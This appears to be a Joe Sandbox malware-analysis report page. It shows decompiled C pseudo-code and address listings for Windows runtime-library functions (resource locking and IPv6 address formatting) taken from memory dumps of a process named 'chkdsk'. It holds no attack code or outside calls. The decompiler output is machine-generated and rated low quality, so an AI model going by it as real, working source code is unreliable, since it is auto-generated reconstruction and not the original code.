                                          0x023d0c5a
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x023d0c60
                                          0x023d0afb
                                          0x023d0afe
                                          0x023d0b02
                                          0x023d0b05
                                          0x023d0b08
                                          0x00000000
                                          0x023d0b08
                                          0x023d0ae6
                                          0x023d0b44
                                          0x023d09f8
                                          0x023d09f8
                                          0x023d09f9
                                          0x00000000
                                          0x00000000
                                          0x023feaa0
                                          0x00000000

                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1173489046.0000000002380000.00000040.00000800.00020000.00000000.sdmp, Offset: 02370000, based on PE: true
                                          • Associated: 00000008.00000002.1173478360.0000000002370000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000008.00000002.1173596901.0000000002460000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000008.00000002.1173605158.0000000002470000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000008.00000002.1173612960.0000000002474000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000008.00000002.1173630096.0000000002477000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000008.00000002.1173640722.0000000002480000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000008.00000002.1173687030.00000000024E0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_2370000_chkdsk.jbxd
                                          Similarity
                                          • API ID: __fassign
                                          • String ID: .$:$:
                                          • API String ID: 3965848254-2308638275
                                          • Opcode ID: b15de34944a390e3fa5e98378680e2de18144008d38fd4e6897fe19ea25b26ab
                                          • Instruction ID: 7a8c7b2c0f8e18a955f5a67dc519c31553e04fcd02afac1e1ee18c5d5b29cf20
                                          • Opcode Fuzzy Hash: b15de34944a390e3fa5e98378680e2de18144008d38fd4e6897fe19ea25b26ab
                                          • Instruction Fuzzy Hash: 51A1AF72D0420ADFCF28CF64E8457FEB7B9EF45B08F24886AD852AB251D7309649CB51
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 023D0554 Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 202COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 50%
                                          			E023D0554(signed int _a4, char _a8) {
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int* _t49;
				signed int _t51;
				signed int _t56;
				signed int _t58;
				signed int _t61;
				signed int _t63;
				void* _t66;
				intOrPtr _t67;
				void* _t69;
				signed int _t70;
				void* _t75;
				signed int _t81;
				signed int _t84;
				void* _t86;
				signed int _t93;
				signed int _t96;
				intOrPtr _t105;
				signed int _t107;
				void* _t110;
				signed int _t115;
				signed int* _t119;
				void* _t125;
				void* _t126;
				signed int _t128;
				signed int _t130;
				signed int _t138;
				signed int _t144;
				void* _t158;
				void* _t159;
				void* _t160;

				_t96 = _a4;
				_t115 =  *(_t96 + 0x28);
				_push(_t138);
				if(_t115 < 0) {
					_t105 =  *[fs:0x18];
					__eflags =  *((intOrPtr*)(_t96 + 0x2c)) -  *((intOrPtr*)(_t105 + 0x24));
					if( *((intOrPtr*)(_t96 + 0x2c)) !=  *((intOrPtr*)(_t105 + 0x24))) {
						goto L6;
					} else {
						__eflags = _t115 | 0xffffffff;
						asm("lock xadd [eax], edx");
						return 1;
					}
				} else {
					L6:
					_push(_t128);
					while(1) {
						L7:
						__eflags = _t115;
						if(_t115 >= 0) {
							break;
						}
						__eflags = _a8;
						if(_a8 == 0) {
							__eflags = 0;
							return 0;
						} else {
							 *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) + 1;
							_t49 = _t96 + 0x1c;
							_t106 = 1;
							asm("lock xadd [edx], ecx");
							_t115 =  *(_t96 + 0x28);
							__eflags = _t115;
							if(_t115 < 0) {
								L23:
								_t130 = 0;
								__eflags = 0;
								while(1) {
									_t118 =  *(_t96 + 0x30) & 0x00000001;
									asm("sbb esi, esi");
									_t144 =  !( ~( *(_t96 + 0x30) & 1)) & 0x024701c0;
									_push(_t144);
									_push(0);
									_t51 = E0238F8CC( *((intOrPtr*)(_t96 + 0x18)));
									__eflags = _t51 - 0x102;
									if(_t51 != 0x102) {
										break;
									}
									_t106 =  *(_t144 + 4);
									_t126 =  *_t144;
									_t86 = E023D4FC0(_t126,  *(_t144 + 4), 0xff676980, 0xffffffff);
									_push(_t126);
									_push(_t86);
									E023E3F92(0x65, 0, "RTL: Acquire Shared Sem Timeout %d(%I64u secs)\n", _t130);
									E023E3F92(0x65, 0, "RTL: Resource at %p\n", _t96);
									_t130 = _t130 + 1;
									_t160 = _t158 + 0x28;
									__eflags = _t130 - 2;
									if(__eflags > 0) {
										E0241217A(_t106, __eflags, _t96);
									}
									_push("RTL: Re-Waiting\n");
									_push(0);
									_push(0x65);
									E023E3F92();
									_t158 = _t160 + 0xc;
								}
								__eflags = _t51;
								if(__eflags < 0) {
									_push(_t51);
									E023D3915(_t96, _t106, _t118, _t130, _t144, __eflags);
									asm("int3");
									while(1) {
										L32:
										__eflags = _a8;
										if(_a8 == 0) {
											break;
										}
										 *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) + 1;
										_t119 = _t96 + 0x24;
										_t107 = 1;
										asm("lock xadd [eax], ecx");
										_t56 =  *(_t96 + 0x28);
										_a4 = _t56;
										__eflags = _t56;
										if(_t56 != 0) {
											L40:
											_t128 = 0;
											__eflags = 0;
											while(1) {
												_t121 =  *(_t96 + 0x30) & 0x00000001;
												asm("sbb esi, esi");
												_t138 =  !( ~( *(_t96 + 0x30) & 1)) & 0x024701c0;
												_push(_t138);
												_push(0);
												_t58 = E0238F8CC( *((intOrPtr*)(_t96 + 0x20)));
												__eflags = _t58 - 0x102;
												if(_t58 != 0x102) {
													break;
												}
												_t107 =  *(_t138 + 4);
												_t125 =  *_t138;
												_t75 = E023D4FC0(_t125, _t107, 0xff676980, 0xffffffff);
												_push(_t125);
												_push(_t75);
												E023E3F92(0x65, 0, "RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)\n", _t128);
												E023E3F92(0x65, 0, "RTL: Resource at %p\n", _t96);
												_t128 = _t128 + 1;
												_t159 = _t158 + 0x28;
												__eflags = _t128 - 2;
												if(__eflags > 0) {
													E0241217A(_t107, __eflags, _t96);
												}
												_push("RTL: Re-Waiting\n");
												_push(0);
												_push(0x65);
												E023E3F92();
												_t158 = _t159 + 0xc;
											}
											__eflags = _t58;
											if(__eflags < 0) {
												_push(_t58);
												E023D3915(_t96, _t107, _t121, _t128, _t138, __eflags);
												asm("int3");
												_t61 =  *_t107;
												 *_t107 = 0;
												__eflags = _t61;
												if(_t61 == 0) {
													L1:
													_t63 = E023B5384(_t138 + 0x24);
													if(_t63 != 0) {
														goto L52;
													} else {
														goto L2;
													}
												} else {
													_t123 =  *((intOrPtr*)(_t138 + 0x18));
													_push( &_a4);
													_push(_t61);
													_t70 = E0238F970( *((intOrPtr*)(_t138 + 0x18)));
													__eflags = _t70;
													if(__eflags >= 0) {
														goto L1;
													} else {
														_push(_t70);
														E023D3915(_t96,  &_a4, _t123, _t128, _t138, __eflags);
														L52:
														_t122 =  *((intOrPtr*)(_t138 + 0x20));
														_push( &_a4);
														_push(1);
														_t63 = E0238F970( *((intOrPtr*)(_t138 + 0x20)));
														__eflags = _t63;
														if(__eflags >= 0) {
															L2:
															return _t63;
														} else {
															_push(_t63);
															E023D3915(_t96,  &_a4, _t122, _t128, _t138, __eflags);
															_t109 =  *((intOrPtr*)(_t138 + 0x20));
															_push( &_a4);
															_push(1);
															_t63 = E0238F970( *((intOrPtr*)(_t138 + 0x20)));
															__eflags = _t63;
															if(__eflags >= 0) {
																goto L2;
															} else {
																_push(_t63);
																_t66 = E023D3915(_t96, _t109, _t122, _t128, _t138, __eflags);
																asm("int3");
																while(1) {
																	_t110 = _t66;
																	__eflags = _t66 - 1;
																	if(_t66 != 1) {
																		break;
																	}
																	_t128 = _t128 | 0xffffffff;
																	_t66 = _t110;
																	asm("lock cmpxchg [ebx], edi");
																	__eflags = _t66 - _t110;
																	if(_t66 != _t110) {
																		continue;
																	} else {
																		_t67 =  *[fs:0x18];
																		 *((intOrPtr*)(_t138 + 0x2c)) =  *((intOrPtr*)(_t67 + 0x24));
																		return _t67;
																	}
																	goto L59;
																}
																E023B5329(_t110, _t138);
																_t69 = E023B53A5(_t138, 1);
																return _t69;
															}
														}
													}
												}
											} else {
												_t56 =  *(_t96 + 0x28);
												goto L3;
											}
										} else {
											_t107 =  *_t119;
											__eflags = _t107;
											if(__eflags > 0) {
												while(1) {
													_t81 = _t107;
													asm("lock cmpxchg [edi], esi");
													__eflags = _t81 - _t107;
													if(_t81 == _t107) {
														break;
													}
													_t107 = _t81;
													__eflags = _t81;
													if(_t81 > 0) {
														continue;
													}
													break;
												}
												_t56 = _a4;
												__eflags = _t107;
											}
											if(__eflags != 0) {
												while(1) {
													L3:
													__eflags = _t56;
													if(_t56 != 0) {
														goto L32;
													}
													_t107 = _t107 | 0xffffffff;
													_t56 = 0;
													asm("lock cmpxchg [edx], ecx");
													__eflags = 0;
													if(0 != 0) {
														continue;
													} else {
														 *((intOrPtr*)(_t96 + 0x2c)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
														return 1;
													}
													goto L59;
												}
												continue;
											} else {
												goto L40;
											}
										}
										goto L59;
									}
									__eflags = 0;
									return 0;
								} else {
									_t115 =  *(_t96 + 0x28);
									continue;
								}
							} else {
								_t106 =  *_t49;
								__eflags = _t106;
								if(__eflags > 0) {
									while(1) {
										_t93 = _t106;
										asm("lock cmpxchg [edi], esi");
										__eflags = _t93 - _t106;
										if(_t93 == _t106) {
											break;
										}
										_t106 = _t93;
										__eflags = _t93;
										if(_t93 > 0) {
											continue;
										}
										break;
									}
									__eflags = _t106;
								}
								if(__eflags != 0) {
									continue;
								} else {
									goto L23;
								}
							}
						}
						goto L59;
					}
					_t84 = _t115;
					asm("lock cmpxchg [esi], ecx");
					__eflags = _t84 - _t115;
					if(_t84 != _t115) {
						_t115 = _t84;
						goto L7;
					} else {
						return 1;
					}
				}
				L59:
			}




































                                          0x023d055a
                                          0x023d055d
                                          0x023d0563
                                          0x023d0566
                                          0x023d05d8
                                          0x023d05e2
                                          0x023d05e5
                                          0x00000000
                                          0x023d05e7
                                          0x023d05e7
                                          0x023d05ea
                                          0x023d05f3
                                          0x023d05f3
                                          0x023d0568
                                          0x023d0568
                                          0x023d0568
                                          0x023d0569
                                          0x023d0569
                                          0x023d0569
                                          0x023d056b
                                          0x00000000
                                          0x00000000
                                          0x023f217f
                                          0x023f2183
                                          0x023f225b
                                          0x023f225f
                                          0x023f2189
                                          0x023f218c
                                          0x023f218f
                                          0x023f2194
                                          0x023f2199
                                          0x023f219d
                                          0x023f21a0
                                          0x023f21a2
                                          0x023f21ce
                                          0x023f21ce
                                          0x023f21ce
                                          0x023f21d0
                                          0x023f21d6
                                          0x023f21de
                                          0x023f21e2
                                          0x023f21e8
                                          0x023f21e9
                                          0x023f21ec
                                          0x023f21f1
                                          0x023f21f6
                                          0x00000000
                                          0x00000000
                                          0x023f21f8
                                          0x023f21fb
                                          0x023f2206
                                          0x023f220b
                                          0x023f220c
                                          0x023f2217
                                          0x023f2226
                                          0x023f222b
                                          0x023f222c
                                          0x023f222f
                                          0x023f2232
                                          0x023f2235
                                          0x023f2235
                                          0x023f223a
                                          0x023f223f
                                          0x023f2241
                                          0x023f2243
                                          0x023f2248
                                          0x023f2248
                                          0x023f224d
                                          0x023f224f
                                          0x023f2262
                                          0x023f2263
                                          0x023f2268
                                          0x023f2269
                                          0x023f2269
                                          0x023f2269
                                          0x023f226d
                                          0x00000000
                                          0x00000000
                                          0x023f2276
                                          0x023f2279
                                          0x023f227e
                                          0x023f2283
                                          0x023f2287
                                          0x023f228a
                                          0x023f228d
                                          0x023f228f
                                          0x023f22bc
                                          0x023f22bc
                                          0x023f22bc
                                          0x023f22be
                                          0x023f22c4
                                          0x023f22cc
                                          0x023f22d0
                                          0x023f22d6
                                          0x023f22d7
                                          0x023f22da
                                          0x023f22df
                                          0x023f22e4
                                          0x00000000
                                          0x00000000
                                          0x023f22e6
                                          0x023f22e9
                                          0x023f22f4
                                          0x023f22f9
                                          0x023f22fa
                                          0x023f2305
                                          0x023f2314
                                          0x023f2319
                                          0x023f231a
                                          0x023f231d
                                          0x023f2320
                                          0x023f2323
                                          0x023f2323
                                          0x023f2328
                                          0x023f232d
                                          0x023f232f
                                          0x023f2331
                                          0x023f2336
                                          0x023f2336
                                          0x023f233b
                                          0x023f233d
                                          0x023f2350
                                          0x023f2351
                                          0x023f2356
                                          0x023f2359
                                          0x023f2359
                                          0x023f235b
                                          0x023f235d
                                          0x023b5367
                                          0x023b536b
                                          0x023b5372
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x023f2363
                                          0x023f2363
                                          0x023f2369
                                          0x023f236a
                                          0x023f236c
                                          0x023f2371
                                          0x023f2373
                                          0x00000000
                                          0x023f2379
                                          0x023f2379
                                          0x023f237a
                                          0x023f237f
                                          0x023f237f
                                          0x023f2385
                                          0x023f2386
                                          0x023f2389
                                          0x023f238e
                                          0x023f2390
                                          0x023b5378
                                          0x023b537c
                                          0x023f2396
                                          0x023f2396
                                          0x023f2397
                                          0x023f239c
                                          0x023f23a2
                                          0x023f23a3
                                          0x023f23a6
                                          0x023f23ab
                                          0x023f23ad
                                          0x00000000
                                          0x023f23b3
                                          0x023f23b3
                                          0x023f23b4
                                          0x023f23b9
                                          0x023f23ba
                                          0x023f23ba
                                          0x023f23bc
                                          0x023f23bf
                                          0x00000000
                                          0x00000000
                                          0x023e9153
                                          0x023e9158
                                          0x023e915a
                                          0x023e915e
                                          0x023e9160
                                          0x00000000
                                          0x023e9166
                                          0x023e9166
                                          0x023e9171
                                          0x023e9176
                                          0x023e9176
                                          0x00000000
                                          0x023e9160
                                          0x023f23c6
                                          0x023f23ce
                                          0x023f23d7
                                          0x023f23d7
                                          0x023f23ad
                                          0x023f2390
                                          0x023f2373
                                          0x023f233f
                                          0x023f233f
                                          0x00000000
                                          0x023f233f
                                          0x023f2291
                                          0x023f2291
                                          0x023f2293
                                          0x023f2295
                                          0x023f229a
                                          0x023f22a1
                                          0x023f22a3
                                          0x023f22a7
                                          0x023f22a9
                                          0x00000000
                                          0x00000000
                                          0x023f22ab
                                          0x023f22ad
                                          0x023f22af
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x023f22af
                                          0x023f22b1
                                          0x023f22b4
                                          0x023f22b4
                                          0x023f22b6
                                          0x023b53be
                                          0x023b53be
                                          0x023b53be
                                          0x023b53c0
                                          0x00000000
                                          0x00000000
                                          0x023b53cb
                                          0x023b53ce
                                          0x023b53d0
                                          0x023b53d4
                                          0x023b53d6
                                          0x00000000
                                          0x023b53d8
                                          0x023b53e3
                                          0x023b53ea
                                          0x023b53ea
                                          0x00000000
                                          0x023b53d6
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x023f22b6
                                          0x00000000
                                          0x023f228f
                                          0x023f2349
                                          0x023f234d
                                          0x023f2251
                                          0x023f2251
                                          0x00000000
                                          0x023f2251
                                          0x023f21a4
                                          0x023f21a4
                                          0x023f21a6
                                          0x023f21a8
                                          0x023f21ac
                                          0x023f21b6
                                          0x023f21b8
                                          0x023f21bc
                                          0x023f21be
                                          0x00000000
                                          0x00000000
                                          0x023f21c0
                                          0x023f21c2
                                          0x023f21c4
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x023f21c4
                                          0x023f21c6
                                          0x023f21c6
                                          0x023f21c8
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x023f21c8
                                          0x023f21a2
                                          0x00000000
                                          0x023f2183
                                          0x023d057b
                                          0x023d057d
                                          0x023d0581
                                          0x023d0583
                                          0x023f2178
                                          0x00000000
                                          0x023d0589
                                          0x023d058f
                                          0x023d058f
                                          0x023d0583
                                          0x00000000

                                          APIs
                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 023F2206
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1173489046.0000000002380000.00000040.00000800.00020000.00000000.sdmp, Offset: 02370000, based on PE: true
                                          • Associated: 00000008.00000002.1173478360.0000000002370000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000008.00000002.1173596901.0000000002460000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000008.00000002.1173605158.0000000002470000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000008.00000002.1173612960.0000000002474000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000008.00000002.1173630096.0000000002477000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000008.00000002.1173640722.0000000002480000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000008.00000002.1173687030.00000000024E0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_2370000_chkdsk.jbxd
                                          Similarity
                                          • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                          • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                          • API String ID: 885266447-4236105082
                                          • Opcode ID: fc76838219d53a557de8ac523783fdad34fa202c05613213f3c86de0ad649ee8
                                          • Instruction ID: 7bd2697c4c439f6a53baf684d1c21640f89f099b7d5de3074e807043ef644491
                                          • Opcode Fuzzy Hash: fc76838219d53a557de8ac523783fdad34fa202c05613213f3c86de0ad649ee8
                                          • Instruction Fuzzy Hash: 54516B31700311AFEF65CA18EC81FA733AAAF84714F218259FE15DB381DA71EC428B90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 023D14C0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 91COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 64%
                                          			E023D14C0(void* __ecx, void* __edx, intOrPtr* _a4, intOrPtr _a8, signed int _a12, intOrPtr _a16, intOrPtr* _a20) {
				signed int _v8;
				char _v10;
				char _v140;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t24;
				void* _t26;
				signed int _t29;
				signed int _t34;
				signed int _t40;
				intOrPtr _t45;
				void* _t51;
				intOrPtr* _t52;
				void* _t54;
				signed int _t57;
				void* _t58;

				_t51 = __edx;
				_t24 =  *0x2472088; // 0x76ee1647
				_v8 = _t24 ^ _t57;
				_t45 = _a16;
				_t53 = _a4;
				_t52 = _a20;
				if(_a4 == 0 || _t52 == 0) {
					L10:
					_t26 = 0xc000000d;
				} else {
					if(_t45 == 0) {
						if( *_t52 == _t45) {
							goto L3;
						} else {
							goto L10;
						}
					} else {
						L3:
						_t28 =  &_v140;
						if(_a12 != 0) {
							_push("[");
							_push(0x41);
							_push( &_v140);
							_t29 = E023C7707();
							_t58 = _t58 + 0xc;
							_t28 = _t57 + _t29 * 2 - 0x88;
						}
						_t54 = E023D13CB(_t53, _t28);
						if(_a8 != 0) {
							_t34 = E023C7707(_t54,  &_v10 - _t54 >> 1, L"%%%u", _a8);
							_t58 = _t58 + 0x10;
							_t54 = _t54 + _t34 * 2;
						}
						if(_a12 != 0) {
							_t40 = E023C7707(_t54,  &_v10 - _t54 >> 1, L"]:%u", _a12 & 0x0000ffff);
							_t58 = _t58 + 0x10;
							_t54 = _t54 + _t40 * 2;
						}
						_t53 = (_t54 -  &_v140 >> 1) + 1;
						 *_t52 = _t53;
						if( *_t52 < _t53) {
							goto L10;
						} else {
							E02392340(_t45,  &_v140, _t53 + _t53);
							_t26 = 0;
						}
					}
				}
				return E0239E1B4(_t26, _t45, _v8 ^ _t57, _t51, _t52, _t53);
			}




















                                          0x023d14c0
                                          0x023d14cb
                                          0x023d14d2
                                          0x023d14d6
                                          0x023d14da
                                          0x023d14de
                                          0x023d14e3
                                          0x023d157a
                                          0x023d157a
                                          0x023d14f1
                                          0x023d14f3
                                          0x023fea0f
                                          0x00000000
                                          0x023fea15
                                          0x00000000
                                          0x023fea15
                                          0x023d14f9
                                          0x023d14f9
                                          0x023d14fe
                                          0x023d1504
                                          0x023fea1a
                                          0x023fea1f
                                          0x023fea21
                                          0x023fea22
                                          0x023fea27
                                          0x023fea2a
                                          0x023fea2a
                                          0x023d1515
                                          0x023d1517
                                          0x023d156d
                                          0x023d1572
                                          0x023d1575
                                          0x023d1575
                                          0x023d151e
                                          0x023fea50
                                          0x023fea55
                                          0x023fea58
                                          0x023fea58
                                          0x023d152e
                                          0x023d1531
                                          0x023d1533
                                          0x00000000
                                          0x023d1535
                                          0x023d1541
                                          0x023d1549
                                          0x023d1549
                                          0x023d1533
                                          0x023d14f3
                                          0x023d1559

                                          APIs
                                          • ___swprintf_l.LIBCMT ref: 023FEA22
                                            • Part of subcall function 023D13CB: ___swprintf_l.LIBCMT ref: 023D146B
                                            • Part of subcall function 023D13CB: ___swprintf_l.LIBCMT ref: 023D1490
                                          • ___swprintf_l.LIBCMT ref: 023D156D
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1173489046.0000000002380000.00000040.00000800.00020000.00000000.sdmp, Offset: 02370000, based on PE: true
                                          • Associated: 00000008.00000002.1173478360.0000000002370000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000008.00000002.1173596901.0000000002460000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000008.00000002.1173605158.0000000002470000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000008.00000002.1173612960.0000000002474000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000008.00000002.1173630096.0000000002477000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000008.00000002.1173640722.0000000002480000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000008.00000002.1173687030.00000000024E0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_2370000_chkdsk.jbxd
                                          Similarity
                                          • API ID: ___swprintf_l
                                          • String ID: %%%u$]:%u
                                          • API String ID: 48624451-3050659472
                                          • Opcode ID: e7aefb095ab8004032baac0f69ee36e561c2abb5eb0feebd338a4f02ff9b4b71
                                          • Instruction ID: a2875271ea7575b2cc6b65ec09e7f5e6e737653f76c49bec6c9973e04acba483
                                          • Opcode Fuzzy Hash: e7aefb095ab8004032baac0f69ee36e561c2abb5eb0feebd338a4f02ff9b4b71
                                          • Instruction Fuzzy Hash: 932195739002199BDF20DE68EC40AEA77BDAB10704F444566ED8AD3140DB75EA58CFE1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 023B53A5 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 185COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 45%
                                          			E023B53A5(signed int _a4, char _a8) {
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t32;
				signed int _t37;
				signed int _t40;
				signed int _t42;
				void* _t45;
				intOrPtr _t46;
				void* _t48;
				signed int _t49;
				void* _t51;
				signed int _t57;
				signed int _t64;
				signed int _t71;
				void* _t74;
				intOrPtr _t78;
				signed int* _t79;
				void* _t85;
				signed int _t86;
				signed int _t92;
				void* _t104;
				void* _t105;

				_t64 = _a4;
				_t32 =  *(_t64 + 0x28);
				_t71 = _t64 + 0x28;
				_push(_t92);
				if(_t32 < 0) {
					_t78 =  *[fs:0x18];
					__eflags =  *((intOrPtr*)(_t64 + 0x2c)) -  *((intOrPtr*)(_t78 + 0x24));
					if( *((intOrPtr*)(_t64 + 0x2c)) !=  *((intOrPtr*)(_t78 + 0x24))) {
						goto L3;
					} else {
						__eflags = _t32 | 0xffffffff;
						asm("lock xadd [ecx], eax");
						return 1;
					}
				} else {
					L3:
					_push(_t86);
					while(1) {
						L4:
						__eflags = _t32;
						if(_t32 == 0) {
							break;
						}
						__eflags = _a8;
						if(_a8 == 0) {
							__eflags = 0;
							return 0;
						} else {
							 *((intOrPtr*)( *((intOrPtr*)(_t64 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t64 + 0x34)) + 0x14)) + 1;
							_t79 = _t64 + 0x24;
							_t71 = 1;
							asm("lock xadd [eax], ecx");
							_t32 =  *(_t64 + 0x28);
							_a4 = _t32;
							__eflags = _t32;
							if(_t32 != 0) {
								L19:
								_t86 = 0;
								__eflags = 0;
								while(1) {
									_t81 =  *(_t64 + 0x30) & 0x00000001;
									asm("sbb esi, esi");
									_t92 =  !( ~( *(_t64 + 0x30) & 1)) & 0x024701c0;
									_push(_t92);
									_push(0);
									_t37 = E0238F8CC( *((intOrPtr*)(_t64 + 0x20)));
									__eflags = _t37 - 0x102;
									if(_t37 != 0x102) {
										break;
									}
									_t71 =  *(_t92 + 4);
									_t85 =  *_t92;
									_t51 = E023D4FC0(_t85, _t71, 0xff676980, 0xffffffff);
									_push(_t85);
									_push(_t51);
									E023E3F92(0x65, 0, "RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)\n", _t86);
									E023E3F92(0x65, 0, "RTL: Resource at %p\n", _t64);
									_t86 = _t86 + 1;
									_t105 = _t104 + 0x28;
									__eflags = _t86 - 2;
									if(__eflags > 0) {
										E0241217A(_t71, __eflags, _t64);
									}
									_push("RTL: Re-Waiting\n");
									_push(0);
									_push(0x65);
									E023E3F92();
									_t104 = _t105 + 0xc;
								}
								__eflags = _t37;
								if(__eflags < 0) {
									_push(_t37);
									E023D3915(_t64, _t71, _t81, _t86, _t92, __eflags);
									asm("int3");
									_t40 =  *_t71;
									 *_t71 = 0;
									__eflags = _t40;
									if(_t40 == 0) {
										L1:
										_t42 = E023B5384(_t92 + 0x24);
										if(_t42 != 0) {
											goto L31;
										} else {
											goto L2;
										}
									} else {
										_t83 =  *((intOrPtr*)(_t92 + 0x18));
										_push( &_a4);
										_push(_t40);
										_t49 = E0238F970( *((intOrPtr*)(_t92 + 0x18)));
										__eflags = _t49;
										if(__eflags >= 0) {
											goto L1;
										} else {
											_push(_t49);
											E023D3915(_t64,  &_a4, _t83, _t86, _t92, __eflags);
											L31:
											_t82 =  *((intOrPtr*)(_t92 + 0x20));
											_push( &_a4);
											_push(1);
											_t42 = E0238F970( *((intOrPtr*)(_t92 + 0x20)));
											__eflags = _t42;
											if(__eflags >= 0) {
												L2:
												return _t42;
											} else {
												_push(_t42);
												E023D3915(_t64,  &_a4, _t82, _t86, _t92, __eflags);
												_t73 =  *((intOrPtr*)(_t92 + 0x20));
												_push( &_a4);
												_push(1);
												_t42 = E0238F970( *((intOrPtr*)(_t92 + 0x20)));
												__eflags = _t42;
												if(__eflags >= 0) {
													goto L2;
												} else {
													_push(_t42);
													_t45 = E023D3915(_t64, _t73, _t82, _t86, _t92, __eflags);
													asm("int3");
													while(1) {
														_t74 = _t45;
														__eflags = _t45 - 1;
														if(_t45 != 1) {
															break;
														}
														_t86 = _t86 | 0xffffffff;
														_t45 = _t74;
														asm("lock cmpxchg [ebx], edi");
														__eflags = _t45 - _t74;
														if(_t45 != _t74) {
															continue;
														} else {
															_t46 =  *[fs:0x18];
															 *((intOrPtr*)(_t92 + 0x2c)) =  *((intOrPtr*)(_t46 + 0x24));
															return _t46;
														}
														goto L38;
													}
													E023B5329(_t74, _t92);
													_push(1);
													_t48 = E023B53A5(_t92);
													return _t48;
												}
											}
										}
									}
								} else {
									_t32 =  *(_t64 + 0x28);
									continue;
								}
							} else {
								_t71 =  *_t79;
								__eflags = _t71;
								if(__eflags > 0) {
									while(1) {
										_t57 = _t71;
										asm("lock cmpxchg [edi], esi");
										__eflags = _t57 - _t71;
										if(_t57 == _t71) {
											break;
										}
										_t71 = _t57;
										__eflags = _t57;
										if(_t57 > 0) {
											continue;
										}
										break;
									}
									_t32 = _a4;
									__eflags = _t71;
								}
								if(__eflags != 0) {
									continue;
								} else {
									goto L19;
								}
							}
						}
						goto L38;
					}
					_t71 = _t71 | 0xffffffff;
					_t32 = 0;
					asm("lock cmpxchg [edx], ecx");
					__eflags = 0;
					if(0 != 0) {
						goto L4;
					} else {
						 *((intOrPtr*)(_t64 + 0x2c)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
						return 1;
					}
				}
				L38:
			}


























                                          0x023b53ab
                                          0x023b53ae
                                          0x023b53b1
                                          0x023b53b4
                                          0x023b53b7
                                          0x023d05b6
                                          0x023d05c0
                                          0x023d05c3
                                          0x00000000
                                          0x023d05c9
                                          0x023d05c9
                                          0x023d05cc
                                          0x023d05d5
                                          0x023d05d5
                                          0x023b53bd
                                          0x023b53bd
                                          0x023b53bd
                                          0x023b53be
                                          0x023b53be
                                          0x023b53be
                                          0x023b53c0
                                          0x00000000
                                          0x00000000
                                          0x023f2269
                                          0x023f226d
                                          0x023f2349
                                          0x023f234d
                                          0x023f2273
                                          0x023f2276
                                          0x023f2279
                                          0x023f227e
                                          0x023f2283
                                          0x023f2287
                                          0x023f228a
                                          0x023f228d
                                          0x023f228f
                                          0x023f22bc
                                          0x023f22bc
                                          0x023f22bc
                                          0x023f22be
                                          0x023f22c4
                                          0x023f22cc
                                          0x023f22d0
                                          0x023f22d6
                                          0x023f22d7
                                          0x023f22da
                                          0x023f22df
                                          0x023f22e4
                                          0x00000000
                                          0x00000000
                                          0x023f22e6
                                          0x023f22e9
